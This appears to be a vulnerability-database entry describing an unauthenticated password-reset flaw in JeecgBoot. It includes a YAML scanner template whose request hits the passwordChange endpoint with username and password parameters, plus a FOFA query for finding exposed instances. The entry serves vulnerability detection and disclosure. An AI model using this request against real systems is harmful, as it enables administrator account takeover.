jeecg-boot-passwordChange-unauth: JeecgBoot Password Reset Vulnerability

日期: 2025-09-01 | 影响软件: JeecgBoot | POC: 已公开

漏洞描述

JeecgBoot system passwordChange interface has an unauthorized password reset vulnerability. An unauthenticated attacker can reset administrator account password by sending a crafted request. FOFA: body="/sys/common/pdf/pdfPreviewIframe"

PoC代码[已公开]

id: jeecg-boot-passwordChange-unauth
info:
  name: JeecgBoot Password Reset Vulnerability
  author: ZacharyZcR
  severity: critical
  verified: true
  description: |
    JeecgBoot system passwordChange interface has an unauthorized password reset vulnerability.
    An unauthenticated attacker can reset administrator account password by sending a crafted request.
    FOFA: body="/sys/common/pdf/pdfPreviewIframe"
  reference:
    - https://github.com/wy876/POC/blob/main/JeecgBoot/JeecgBoot%E7%B3%BB%E7%BB%9F%E6%8E%A5%E5%8F%A3passwordChange%E4%BB%BB%E6%84%8F%E7%94%A8%E6%88%B7%E5%AF%86%E7%A0%81%E9%87%8D%E7%BD%AE%E6%BC%8F%E6%B4%9E.md

rules:
  r0:
    request:
      method: GET
      path: /jeecg-boot/sys/user/passwordChange?username=admin1&password=admin&smscode=&phone=
    expression: |
      response.status == 200 && 
      response.body.bcontains(b'"success":false') && 
      response.body.bcontains(b'"code":0') &&
      response.body.bcontains(b'"重置密码失败！"')
expression: r0()

来源: https://github.com/zan8in/afrog/blob/main/pocs/afrog-pocs/vulnerability/jeecg-boot-passwordChange-unauth.yaml

漏洞描述

PoC代码[已公开]

相关漏洞推荐

Jeecgboot /jmreport/save远程代码执行漏洞 无POC

jeecgboot-passwordchange-user-reset-unauth: JeecgBoot 任意用户密码重置 POC

jeecgboot-swagger: JeecgBoot 后台服务 API 接口文档 POC

LemonLDAP::NG 操作系统命令注入漏洞 无POC

万户OA informationmanager_upload.jsp 任意文件上传漏洞 无POC

Jeecgboot /jmreport/save远程代码执行漏洞无POC

LemonLDAP::NG 操作系统命令注入漏洞无POC

万户OA informationmanager_upload.jsp 任意文件上传漏洞无POC